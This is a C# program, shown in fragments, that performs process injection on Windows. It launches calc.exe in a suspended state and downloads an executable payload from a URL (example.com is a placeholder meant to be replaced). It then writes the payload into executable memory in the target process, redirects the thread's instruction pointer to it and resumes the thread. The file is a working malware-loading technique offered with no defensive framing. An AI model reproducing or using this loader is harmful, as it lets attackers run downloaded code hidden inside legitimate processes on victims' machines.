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System.Net.Http;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Constants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const uint CREATE_SUSPENDED = 0x00000004;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const uint CONTEXT_FULL = 0x10000B;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const uint MEM_COMMIT = 0x1000;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const uint MEM_RESERVE = 0x2000;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const uint PAGE_EXECUTE_READWRITE = 0x40;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struct SECURITY_ATTRIBUTES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public uint nLength;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IntPtr lpSecurityDescriptor;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public bool bInheritHandle;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struct PROCESS_INFORMATION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public IntPtr hProcess;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public IntPtr hThread;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uint dwProcessId;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uint dwThreadId;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[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]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struct STARTUPINFO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public uint cb;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public string lpReserved;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string lpDesktop;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public string lpTitle;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uint dwX;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public uint dwY;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uint dwXSize;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public uint dwYSize;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public uint dwXCountChars;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public uint dwYCountChars;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public uint dwFillAttribute;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public uint dwFlags;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public ushort wShowWindow;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public ushort cbReserved2;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public IntPtr lpReserved2;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public IntPtr hStdInput;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public IntPtr hStdOutput;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public IntPtr hStdError;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[StructLayout(LayoutKind.Sequential)]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struct CONTEXT64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public ulong P1Home;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public ulong P2Home;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public ulong P3Home;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ulong P4Home;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public ulong P5Home;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public ulong P6Home;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public uint ContextFlags;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public uint MxCsr;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public ushort SegCs;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public ushort SegDs;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public ushort SegEs;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public ushort SegFs;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public ushort SegGs;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public ushort SegSs;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public uint EFlags;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public ulong Dr0;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public ulong Dr1;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ulong Dr2;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public ulong Dr3;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public ulong Dr6;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public ulong Dr7;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public ulong Rax;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public ulong Rcx;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public ulong Rdx;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public ulong Rbx;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public ulong Rsp;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public ulong Rbp;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public ulong Rsi;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public ulong Rdi;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public ulong R8;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public ulong R9;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public ulong R10;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public ulong R11;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public ulong R12;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public ulong R13;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public ulong R14;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public ulong R15;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public ulong Rip;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 P/Invoke declarations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[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]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static extern bool CreateProcess(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string lpApplicationName,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string lpCommandLine,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IntPtr lpProcessAttributes,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IntPtr lpThreadAttributes,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bool bInheritHandles,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uint dwCreationFlags,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IntPtr lpEnvironment,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string lpCurrentDirectory,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ref STARTUPINFO lpStartupInfo,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out PROCESS_INFORMATION lpProcessInformation);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static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);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static extern IntPtr VirtualAllocEx(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IntPtr hProcess,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IntPtr lpAddress,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uint dwSize,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uint flAllocationType,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uint flProtect);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static extern bool WriteProcessMemory(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IntPtr hProcess,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IntPtr lpBaseAddress,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byte[] lpBuffer,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uint nSize,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out IntPtr lpNumberOfBytesWritten);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static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);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[DllImport("kernel32.dll", SetLastError = true)]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static extern uint ResumeThread(IntPtr hThread);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static async Task Main(string[] args)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string payloadUrl = "http://example.com/payload.exe"; // Replace with user input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string targetExe = @"C:\WINDOWS\System32\calc.exe";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Console.WriteLine($"Starting {targetExe} in suspended state...");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STARTUPINFO startupInfo = new STARTUPINFO();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PROCESS_INFORMATION processInfo;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(!CreateProcess(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targetExe,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CREATE_SUSPENDED,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ref startupInfo,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out processInfo))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Console.WriteLine($"Error creating process: {Marshal.GetLastWin32Error()}");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Console.WriteLine("Downloading payload...");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byte[] payloadData = await DownloadPayloadAsync(payloadUrl);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CONTEXT64 context = new CONTEXT64 { ContextFlags = CONTEXT_FULL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(!GetThreadContext(processInfo.hThread, ref context))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Console.WriteLine($"Error getting thread context: {Marshal.GetLastWin32Error()}");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IntPtr allocatedMemory = VirtualAllocEx(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processInfo.hProcess,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IntPtr.Zero,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(uint)payloadData.Length,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MEM_COMMIT | MEM_RESERVE,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PAGE_EXECUTE_READWRITE);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(allocatedMemory == IntPtr.Zero)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Console.WriteLine($"Error allocating memory: {Marshal.GetLastWin32Error()}");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Console.WriteLine($"Memory allocated at {allocatedMemory}");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IntPtr bytesWritten;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(!WriteProcessMemory(processInfo.hProcess, allocatedMemory, payloadData, (uint)payloadData.Length, out bytesWritten))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Console.WriteLine($"Error writing payload: {Marshal.GetLastWin32Error()}");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context.Rip = (ulong)allocatedMemory;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 (!SetThreadContext(processInfo.hThread, ref context))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Console.WriteLine($"Error setting thread context: {Marshal.GetLastWin32Error()}");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Console.WriteLine("Resuming thread...");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if (ResumeThread(processInfo.hThread) == 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Console.WriteLine($"Error resuming thread: {Marshal.GetLastWin32Error()}");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Console.WriteLine("Injection complete.");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Async method to download the payload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static async Task&lt;byte[]&gt; DownloadPayloadAsync(string url)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using (HttpClient client = new HttpClient())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return await client.GetByteArrayAsync(url);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Console.WriteLine($"Error downloading payload: {ex.Message}");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